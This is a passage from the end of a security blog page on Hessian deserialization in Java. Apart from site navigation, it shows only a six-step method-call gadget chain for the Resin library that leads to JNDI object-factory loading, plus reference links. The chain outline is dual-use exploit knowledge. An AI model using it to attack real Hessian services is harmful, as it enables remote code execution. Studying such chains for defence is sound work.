<h3 id="Resin"><a href="#Resin" class="headerlink" title="Resin"></a>Resin</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">HashMap.put()</span><br><span class="line">-&gt;XString.equals()</span><br><span class="line">-&gt;QName.toString()</span><br><span class="line">-&gt;ContinuationContext.composeName()</span><br><span class="line">-&gt;NamingManager.getContext()</span><br><span class="line">-&gt;NamingManager.getObjectFactoryFromReference()</span><br></pre></td></tr></table></figure>

<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><p><a target="_blank" rel="noopener" href="https://su18.org/post/hessian/">https://su18.org/post/hessian/</a></p>
<p><a target="_blank" rel="noopener" href="https://p4d0rn.gitbook.io/java/serial-journey/hessian">https://p4d0rn.gitbook.io/java/serial-journey/hessian</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/p3ngu1nw">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Hessian"><span class="toc-number">1.</span> <span class="toc-text">Hessian</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Demo"><span class="toc-number">1.2.</span> <span class="toc-text">Demo</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Spring-Based"><span class="toc-number">1.2.1.</span> <span class="toc-text">Spring Based</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Server"><span class="toc-number">1.2.1.1.</span> <span class="toc-text">Server</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Client"><span class="toc-number">1.2.1.2.</span> <span class="toc-text">Client</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Result"><span class="toc-number">1.2.1.3.</span> <span class="toc-text">Result</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Servlet-Based"><span class="toc-number">1.2.2.</span> <span class="toc-text">Servlet Based</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Server-1"><span class="toc-number">1.2.2.1.</span> <span class="toc-text">Server</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Result-1"><span class="toc-number">1.2.2.2.</span> <span class="toc-text">Result</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#com-caucho-hessian-server-HessianServlet"><span class="toc-number">1.2.2.3.</span> <span class="toc-text">com.caucho.hessian.server.HessianServlet</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#init"><span class="toc-number">1.2.2.3.1.</span> <span class="toc-text">init</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#service"><span class="toc-number">1.2.2.3.2.</span> <span class="toc-text">service</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#com-caucho-hessian-server-HessianSkeleton"><span class="toc-number">1.2.2.4.</span> <span class="toc-text">com.caucho.hessian.server.HessianSkeleton</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#initialization"><span class="toc-number">1.2.2.4.1.</span> <span class="toc-text">initialization</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#invoke"><span class="toc-number">1.2.2.4.2.</span> <span class="toc-text">invoke</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HessianSerialize"><span class="toc-number">1.3.</span> <span class="toc-text">HessianSerialize</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#writeObject"><span class="toc-number">1.3.1.</span> <span class="toc-text">writeObject()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#readObject"><span class="toc-number">1.3.2.</span> <span class="toc-text">readObject()</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Remote-Function-Call"><span class="toc-number">1.4.</span> <span class="toc-text">Remote Function Call</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploit"><span class="toc-number">1.5.</span> <span class="toc-text">Exploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ROME"><span class="toc-number">1.5.1.</span> <span class="toc-text">ROME</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#JNDI"><span class="toc-number">1.5.1.1.</span> <span class="toc-text">JNDI</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SignedObject"><span class="toc-number">1.5.1.2.</span> <span class="toc-text">SignedObject</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Resin"><span class="toc-number">1.5.2.</span> <span class="toc-text">Resin</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Reference"><span class="toc-number">1.6.</span> <span class="toc-text">Reference</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/08/31/Hessian/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/08/31/Hessian/&text=Hessian"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/08/31/Hessian/&is_video=false&description=Hessian"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Hessian&body=Check out this article: http://example.com/2023/08/31/Hessian/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/08/31/Hessian/&title=Hessian"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/08/31/Hessian/&name=Hessian&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/08/31/Hessian/&t=Hessian"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2023
    P3ngu1nW
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/p3ngu1nw">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
